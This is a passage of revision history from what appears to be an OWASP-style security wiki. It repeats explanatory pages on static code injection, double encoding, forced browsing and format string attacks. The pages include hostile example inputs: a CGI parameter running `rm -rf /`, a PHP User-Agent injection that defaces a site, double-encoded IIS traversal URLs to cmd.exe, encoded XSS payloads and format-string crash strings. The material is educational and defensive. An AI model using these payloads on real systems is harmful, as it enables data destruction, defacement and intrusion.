csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

==Related [[Threat Agents]]==

* [[:Category:Insider]]

* [[:Category:Staff]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

* [[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Direct Static Code Injection

2008-07-02T11:39:54Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

==Related [[Threat Agents]]==

* [[:Category:Insider]]

* [[:Category:Staff]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

* [[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Direct Static Code Injection

2008-07-02T11:39:42Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

==Related [[Threat Agents]]==

* [[:Category:Insider]]

* [[:Category:Staff]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Double Encoding

2008-07-02T11:39:26Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack technique consists of encode user request parameters twice in hexadecimal format in order to bypass security controls or cause unexpected behavior from application. It's possible because the webserver accept and process client requests in many encoded forms

By using double encoding it’s possible to bypass security filters that only decode user input once, being. the second decoding process executed by backend platform or modules that properly handle encoded data but don't have the corresponding security checks in place.

Attackers can inject double encoding in pathnames or query strings to bypass authentication schema and security filters in use by web application.

There are some common characters sets that are used in Web applications attacks. For example, in directory traversal attacks, it uses “../” (dot-dot-slash) , while in XSS attacks, it uses “<” and “>” characters. These characters give hexadecimal representation that differs from normal data.

For example, “../” (dot-dot-slash) characters represents %2E%2E%2f in hexadecimal representation. When the % symbol is encoded again, its representation in hexadecimal code is %25. The resultant from double encoding process ”../”(dot-dot-slash) would be %252E%252E%252F:

Hexadecimal encode of “../” represents "%2E%2E%2f"

Then encoding the “%” represents "%25"

Double encoding of “../” represents "%252E%252E%252F"

==Examples==

===Example 1 ===
This example presents an old well-know vulnerability found on IIS versions 4.0 and 5.0, where an attacker could bypass authorization schema and gain access to any file on the same drive as the web root directory due an issue on decoding mechanism. For more details about folder traversal vulnerability, see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 CVE 2001-0333].

In this scenario, the victim has an published executable directory (e.g. cgi) that’s stored on the same partition of Windows system folder. An attacker could execute arbitrary commands on the web server by submitting the following URL:

Original URL:

<nowiki>http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\</nowiki>

However, the application uses a security check filter that refuses requests containing characters like “../”. By double encoding the URL, it’s possible to bypass security the filter:

Double encoded URL:

<nowiki>http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ </nowiki>

===Example 2 ===
A double encoding URL can be used to exploit XSS attack in order to bypass a built-in XSS detection module. Depending on implementation, the first decoding process is performed by HTTP protocol and the resultant encoded URL will bypass XSS filter, since it has no mechanisms to improve detection. A simple example XSS would be:

<script>alert('XSS')</script>

This malicious code could be inserted into a vulnerable application, resulting in a alert window with message “XSS”. However the web application can have a character filter such as “< “, “>” and “/”, since they are used to perform web application attacks. The attacker could use double encoding technique to bypass the filter and exploit client’s session. The encoding process for this Java script is:

<table >

<tr>
<td colspan=30><b> Char </b></td>
<td colspan=40><b> Hex encode </b></td>
<td colspan=50%><b> Then encoding '%' </b></td>
<td colspan=50%><b> Double encode </b></td>
</tr>

<tr>
<td colspan=30> “<” </td>
<td colspan=40> “%3C” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253C” </td>
</tr>

<tr>
<td colspan=30> “/” </td>
<td colspan=40> “%2F” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%252F” </td>
</tr>

<tr>
<td colspan=30> “>” </td>
<td colspan=40> “%3E” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253E” </td>
</tr>

</table>

Finally, the malicious double encoding code is:

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

==Related [[Threat Agents]]==

* [[:Category: Insider]]

* [[:Category: Staff]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[XSS Attacks]]
*[[Path Traversal]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1945

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0054

[[Category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Double Encoding

2008-07-02T11:39:14Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack technique consists of encode user request parameters twice in hexadecimal format in order to bypass security controls or cause unexpected behavior from application. It's possible because the webserver accept and process client requests in many encoded forms

By using double encoding it’s possible to bypass security filters that only decode user input once, being. the second decoding process executed by backend platform or modules that properly handle encoded data but don't have the corresponding security checks in place.

Attackers can inject double encoding in pathnames or query strings to bypass authentication schema and security filters in use by web application.

There are some common characters sets that are used in Web applications attacks. For example, in directory traversal attacks, it uses “../” (dot-dot-slash) , while in XSS attacks, it uses “<” and “>” characters. These characters give hexadecimal representation that differs from normal data.

For example, “../” (dot-dot-slash) characters represents %2E%2E%2f in hexadecimal representation. When the % symbol is encoded again, its representation in hexadecimal code is %25. The resultant from double encoding process ”../”(dot-dot-slash) would be %252E%252E%252F:

Hexadecimal encode of “../” represents "%2E%2E%2f"

Then encoding the “%” represents "%25"

Double encoding of “../” represents "%252E%252E%252F"

==Examples==

===Example 1 ===
This example presents an old well-know vulnerability found on IIS versions 4.0 and 5.0, where an attacker could bypass authorization schema and gain access to any file on the same drive as the web root directory due an issue on decoding mechanism. For more details about folder traversal vulnerability, see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 CVE 2001-0333].

In this scenario, the victim has an published executable directory (e.g. cgi) that’s stored on the same partition of Windows system folder. An attacker could execute arbitrary commands on the web server by submitting the following URL:

Original URL:

<nowiki>http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\</nowiki>

However, the application uses a security check filter that refuses requests containing characters like “../”. By double encoding the URL, it’s possible to bypass security the filter:

Double encoded URL:

<nowiki>http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ </nowiki>

===Example 2 ===
A double encoding URL can be used to exploit XSS attack in order to bypass a built-in XSS detection module. Depending on implementation, the first decoding process is performed by HTTP protocol and the resultant encoded URL will bypass XSS filter, since it has no mechanisms to improve detection. A simple example XSS would be:

<script>alert('XSS')</script>

This malicious code could be inserted into a vulnerable application, resulting in a alert window with message “XSS”. However the web application can have a character filter such as “< “, “>” and “/”, since they are used to perform web application attacks. The attacker could use double encoding technique to bypass the filter and exploit client’s session. The encoding process for this Java script is:

<table >

<tr>
<td colspan=30><b> Char </b></td>
<td colspan=40><b> Hex encode </b></td>
<td colspan=50%><b> Then encoding '%' </b></td>
<td colspan=50%><b> Double encode </b></td>
</tr>

<tr>
<td colspan=30> “<” </td>
<td colspan=40> “%3C” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253C” </td>
</tr>

<tr>
<td colspan=30> “/” </td>
<td colspan=40> “%2F” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%252F” </td>
</tr>

<tr>
<td colspan=30> “>” </td>
<td colspan=40> “%3E” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253E” </td>
</tr>

</table>

Finally, the malicious double encoding code is:

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

==Related [[Threat Agents]]==

* [[:Category: Insider]]

* [[:Category: Staff]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[XSS Attacks]]
*[[Path Traversal]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1945

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0054

[[Category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Double Encoding

2008-07-02T11:39:03Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack technique consists of encode user request parameters twice in hexadecimal format in order to bypass security controls or cause unexpected behavior from application. It's possible because the webserver accept and process client requests in many encoded forms

By using double encoding it’s possible to bypass security filters that only decode user input once, being. the second decoding process executed by backend platform or modules that properly handle encoded data but don't have the corresponding security checks in place.

Attackers can inject double encoding in pathnames or query strings to bypass authentication schema and security filters in use by web application.

There are some common characters sets that are used in Web applications attacks. For example, in directory traversal attacks, it uses “../” (dot-dot-slash) , while in XSS attacks, it uses “<” and “>” characters. These characters give hexadecimal representation that differs from normal data.

For example, “../” (dot-dot-slash) characters represents %2E%2E%2f in hexadecimal representation. When the % symbol is encoded again, its representation in hexadecimal code is %25. The resultant from double encoding process ”../”(dot-dot-slash) would be %252E%252E%252F:

Hexadecimal encode of “../” represents "%2E%2E%2f"

Then encoding the “%” represents "%25"

Double encoding of “../” represents "%252E%252E%252F"

==Examples==

===Example 1 ===
This example presents an old well-know vulnerability found on IIS versions 4.0 and 5.0, where an attacker could bypass authorization schema and gain access to any file on the same drive as the web root directory due an issue on decoding mechanism. For more details about folder traversal vulnerability, see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 CVE 2001-0333].

In this scenario, the victim has an published executable directory (e.g. cgi) that’s stored on the same partition of Windows system folder. An attacker could execute arbitrary commands on the web server by submitting the following URL:

Original URL:

<nowiki>http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\</nowiki>

However, the application uses a security check filter that refuses requests containing characters like “../”. By double encoding the URL, it’s possible to bypass security the filter:

Double encoded URL:

<nowiki>http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ </nowiki>

===Example 2 ===
A double encoding URL can be used to exploit XSS attack in order to bypass a built-in XSS detection module. Depending on implementation, the first decoding process is performed by HTTP protocol and the resultant encoded URL will bypass XSS filter, since it has no mechanisms to improve detection. A simple example XSS would be:

<script>alert('XSS')</script>

This malicious code could be inserted into a vulnerable application, resulting in a alert window with message “XSS”. However the web application can have a character filter such as “< “, “>” and “/”, since they are used to perform web application attacks. The attacker could use double encoding technique to bypass the filter and exploit client’s session. The encoding process for this Java script is:

<table >

<tr>
<td colspan=30><b> Char </b></td>
<td colspan=40><b> Hex encode </b></td>
<td colspan=50%><b> Then encoding '%' </b></td>
<td colspan=50%><b> Double encode </b></td>
</tr>

<tr>
<td colspan=30> “<” </td>
<td colspan=40> “%3C” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253C” </td>
</tr>

<tr>
<td colspan=30> “/” </td>
<td colspan=40> “%2F” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%252F” </td>
</tr>

<tr>
<td colspan=30> “>” </td>
<td colspan=40> “%3E” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253E” </td>
</tr>

</table>

Finally, the malicious double encoding code is:

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

==Related [[Threat Agents]]==

* [[:Category: Insider]]

* [[:Category: Staff]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[XSS Attacks]]
*[[Path Traversal]]

==Related [[Vulnerabilities]]==

[[:Category: Input Validation]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1945

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0054

[[Category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Forced browsing

2008-07-02T11:38:38Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Forced browsing is an attack that’s aim to enumerate and access resources that are not referenced by the application, but still can be accessible.

An attacker can use brute force techniques to search for unlinked contents in domain directory, such as temporary directories and files, old backup and configuration files. These resources may store sensitive information about web applications and operational system, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.

This attack should be performed manually when the application index directories and pages based on number generation or predictable values, or using automated tools for common files and directories names.

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

==Examples==

===Example 1===
This example presents a technique of Predictable Resource Location attack, which is based on a manual and oriented identification of resources by modifying URL parameters.
The user1 wants to check his on-line agenda that is done thru the following URL:

<nowiki> www.site-example.com/users/calendar.php/user1/20070715 </nowiki>

In the URL, it is possible to identify the username (“user1”) and the date (mm/dd/yyyy).If the user attempts to make a forced browsing attack, he could guess another user’s agenda by predicting user identification and date, as follow:

<nowiki> www.site-example.com/users/calendar.php/user6/20070716 </nowiki>

The attack can be considered successful upon accessing other user agenda. A bad implementation of the authorization mechanism also collaborated for this attack success.

===Example 2 ===
This example presents how to perform an attack of static directory and file enumeration using an automated tool.

A scanning tool, like [http://www.cirt.net/code/nikto.shtml | Nikto], has the ability to search for existent files and directories based on a database of well-know resources, such as:

/system/
/password/
/logs/
/admin/
/test/

When the tool receives and “HTTP 200” message it means that such resource was found and should be manually inspected for valuable information.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Path Traversal]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

* [[:Category:Access Control Vulnerability]]

==Related [[Controls]]==

* [[:Category: Access Control]]

==References==

*Forceful Browsing – Imperva Application Data Security and Compliance - http://www.imperva.com/application_defense_center/glossary/forceful_browsing.html

*Parameter fuzzing and forced browsing – WebAppSec - http://seclists.org/webappsec/2006/q3/0182.html

*http://www.webappsec.org/projects/threat/classes/predictable_resource_location.shtml

*http://cwe.mitre.org/data/definitions/425.html

[[category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Forced browsing

2008-07-02T11:38:28Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Forced browsing is an attack that’s aim to enumerate and access resources that are not referenced by the application, but still can be accessible.

An attacker can use brute force techniques to search for unlinked contents in domain directory, such as temporary directories and files, old backup and configuration files. These resources may store sensitive information about web applications and operational system, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.

This attack should be performed manually when the application index directories and pages based on number generation or predictable values, or using automated tools for common files and directories names.

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

==Examples==

===Example 1===
This example presents a technique of Predictable Resource Location attack, which is based on a manual and oriented identification of resources by modifying URL parameters.
The user1 wants to check his on-line agenda that is done thru the following URL:

<nowiki> www.site-example.com/users/calendar.php/user1/20070715 </nowiki>

In the URL, it is possible to identify the username (“user1”) and the date (mm/dd/yyyy).If the user attempts to make a forced browsing attack, he could guess another user’s agenda by predicting user identification and date, as follow:

<nowiki> www.site-example.com/users/calendar.php/user6/20070716 </nowiki>

The attack can be considered successful upon accessing other user agenda. A bad implementation of the authorization mechanism also collaborated for this attack success.

===Example 2 ===
This example presents how to perform an attack of static directory and file enumeration using an automated tool.

A scanning tool, like [http://www.cirt.net/code/nikto.shtml | Nikto], has the ability to search for existent files and directories based on a database of well-know resources, such as:

/system/
/password/
/logs/
/admin/
/test/

When the tool receives and “HTTP 200” message it means that such resource was found and should be manually inspected for valuable information.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Path Traversal]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

* [[:Category:Access Control Vulnerability]]

==Related [[Controls]]==

[[:Category: Access Control]]

==References==

*Forceful Browsing – Imperva Application Data Security and Compliance - http://www.imperva.com/application_defense_center/glossary/forceful_browsing.html

*Parameter fuzzing and forced browsing – WebAppSec - http://seclists.org/webappsec/2006/q3/0182.html

*http://www.webappsec.org/projects/threat/classes/predictable_resource_location.shtml

*http://cwe.mitre.org/data/definitions/425.html

[[category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Forced browsing

2008-07-02T11:38:18Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Forced browsing is an attack that’s aim to enumerate and access resources that are not referenced by the application, but still can be accessible.

An attacker can use brute force techniques to search for unlinked contents in domain directory, such as temporary directories and files, old backup and configuration files. These resources may store sensitive information about web applications and operational system, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.

This attack should be performed manually when the application index directories and pages based on number generation or predictable values, or using automated tools for common files and directories names.

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

==Examples==

===Example 1===
This example presents a technique of Predictable Resource Location attack, which is based on a manual and oriented identification of resources by modifying URL parameters.
The user1 wants to check his on-line agenda that is done thru the following URL:

<nowiki> www.site-example.com/users/calendar.php/user1/20070715 </nowiki>

In the URL, it is possible to identify the username (“user1”) and the date (mm/dd/yyyy).If the user attempts to make a forced browsing attack, he could guess another user’s agenda by predicting user identification and date, as follow:

<nowiki> www.site-example.com/users/calendar.php/user6/20070716 </nowiki>

The attack can be considered successful upon accessing other user agenda. A bad implementation of the authorization mechanism also collaborated for this attack success.

===Example 2 ===
This example presents how to perform an attack of static directory and file enumeration using an automated tool.

A scanning tool, like [http://www.cirt.net/code/nikto.shtml | Nikto], has the ability to search for existent files and directories based on a database of well-know resources, such as:

/system/
/password/
/logs/
/admin/
/test/

When the tool receives and “HTTP 200” message it means that such resource was found and should be manually inspected for valuable information.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Path Traversal]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Access Control Vulnerability]]

==Related [[Controls]]==

[[:Category: Access Control]]

==References==

*Forceful Browsing – Imperva Application Data Security and Compliance - http://www.imperva.com/application_defense_center/glossary/forceful_browsing.html

*Parameter fuzzing and forced browsing – WebAppSec - http://seclists.org/webappsec/2006/q3/0182.html

*http://www.webappsec.org/projects/threat/classes/predictable_resource_location.shtml

*http://cwe.mitre.org/data/definitions/425.html

[[category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:38:02Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

* [[:Category: Internal software developer]]

* [[:Category: Outsourced software developer]]

* [[:Category: Insider]]

* [[:Category: Outsider]]

==Related [[Attacks]]==

* [[Code Injection]]

==Related [[Vulnerabilities]]==

* [[Buffer Overflow]]

==Related [[Controls]]==

* [[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:37:48Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
